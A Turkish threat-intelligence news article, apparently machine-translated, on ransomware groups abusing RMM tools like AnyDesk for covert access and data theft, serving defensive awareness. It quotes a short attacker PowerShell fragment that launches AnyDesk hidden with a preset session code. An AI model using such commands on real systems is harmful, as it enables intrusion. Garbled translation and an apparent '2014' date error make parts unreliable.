Uzaktan İzleme ve Yönetim (RMM) yazılımı uzun zamandır yardım-desk mühendislerinin sessiz ortağı olmuştur, yama döngülerini otomatikleştirir ve genişleyen işletmelerdeki sorun giderme oturumları.
Bununla birlikte, geçtiğimiz yıl, aynı uzak konsollar, yerleşik güven, yüksek ayrıcalıklar ve bu araçların sağladığı şifreli tünelleri isteyen fidye yazılımı çeteleri tarafından sessizce yeniden tasarlandı.
Meşru BT aktivitesi olarak maskelenerek, suçlu operatörler, buluttan oturum açan yaptırımlı ikili dosyalar için değil, klasik kötü amaçlı yazılım işaretleri için ayarlanmış kalan uç nokta algılama çözümlerini atlar.
RMM tabanlı müdahalelere doğru pivot, birkaç kampanyanın özel yükleyicileri AnyDesk, Screenconnect, PDQ dağıtım ve SimpleHelp gibi hazır ajanlarla değiştirdiğinde 2014’ün sonlarında hızlandı.
Saldırganlar, kurulumcunun normal güncelleme kanallarına veya kimlik avı yemlerindeki tesis trojanize paketlerine binerler, daha sonra yanal olarak fan ve verileri ilk yürütme dakikalarında çift uzatma için sahne alırlar.
Birden fazla olayda, fidye yazılımı yükünün kendisi, ilk sahil başlığından haftalar sonra tetiklendi ve bu da pesfiltrasyonun rutin idari konuşmanın arkasında fark edilmemesine izin verdi.
Cato Networks analistleri, üç kurban kuruluşunda ağ adli tıplarını yeniden yapılandırırken eğilimi kaydetti: Hunters International tarafından vurulan bir İngiliz üretici, Medusa tarafından sakatlanan bir ABD inşaat firması ve isimsiz bir bağlı kuruluş tarafından ihlal edilen bir kar amacı gütmeyen bir kuruluş.
Her durumda paket yakalamalar, bulut rölelerine şifreli dosya transferleri ile takip edilen, giden TCP/7070 akışlarının (Anydesk Rendezvous bağlantı noktası) bir anlatım artışı gösterdi.
İkili dosyalar politika tarafından imzalandığından ve zaten beyaz listeye alındığından, uç nokta günlükleri kırmızı bayrak oluşturmadı. Trafiğin daha derin bir incelemesi, RMM ajanlarının çok işlevli kötü amaçlı yazılım damlası olarak hizmet ettiğini ortaya koydu.
Keyfi PowerShell komut dosyalarını indirirler, kalıcılık görevlerini planlarlar ve hatta son dolabın kendi yazılım dağıtım modülleri aracılığıyla kütle dağıtımını düzenlerler.
Çift kullanımlı ikilem, savunucuları, imzaya dayalı kurallara güvenmekten ziyade, bir ev sahibi veya beklenmedik saat dışı oturumlarda ilk kez kullanım gibi bağlamı denetlemeye zorlar.
Sertifika sırılsıklam tünelleri ile tespit kaçınma
Operatörler tarafından istismar edilen en sinsi yetenek, birçok ticari RMM teklifine gömülü sertifika sırılsıklam TLS tünelidir.
Aracı yalnızca satıcının sert kodlanmış sertifika zincirini doğruladığından, geleneksel SSL müdahalesi veya kum havuzu, bağlantı hatasını tetiklemeden yükü kıramaz ve inceleyemez.
.webp)
Rakipler, sahne iki senaryolarını ve fikri mülkiyetin sifon gigabaytlarını zorlamak için bu gizlilik garantisini kullanıyor.
Hunters International davasından kurtarılan aşağıdaki PowerShell fragmanı, ev telefonu için kurulmuş bir anydesk istemcisinde sessizce piggy sırtlarının nasıl birleştirilmiş bir .lnk kısayolunu gösteriyor:
$session = Start-Process "C:\\Program Files\\AnyDesk\\AnyDesk.exe" `
-ArgumentList "--with-session-code=742983451 --plain" `
-WindowStyle Hidden -PassThru;
Start-Sleep -Seconds 5;
$session.WaitForExit()Burada, saldırgan mevcut bir ikili çağırır, önceden atanmış bir oturum kodunu geçer, pencereyi gizler ve uzak masaüstü kanalı etkin olduğunda kontrolden vazgeçer.
Diske yeni bir yürütülebilir yazma yazılmadığından, dosya yaratma olaylarına odaklanan davranışsal buluşsal yöntemler kör olmaya devam etmektedir.
Satıcılar, hedef parmak izleri ve beklenmedik CLI bayrakları gibi granüler telemetriyi ortaya çıkarana kadar güvenlik ekipleri, şifreleme iş parçacıkları taramaya başlamadan önce ilk yetkisiz konsol lansmanını tespit etmek için ağ anomali algılamasını katı rol tabanlı erişim politikalarıyla birleştirmelidir.
Tespiti artırın, uyarı yorgunluğunu azaltın, yanıtı hızlandırın; Güvenlik ekipleri için inşa edilmiş etkileşimli bir sanal alan ile hepsi -> Herhangi bir deneyin.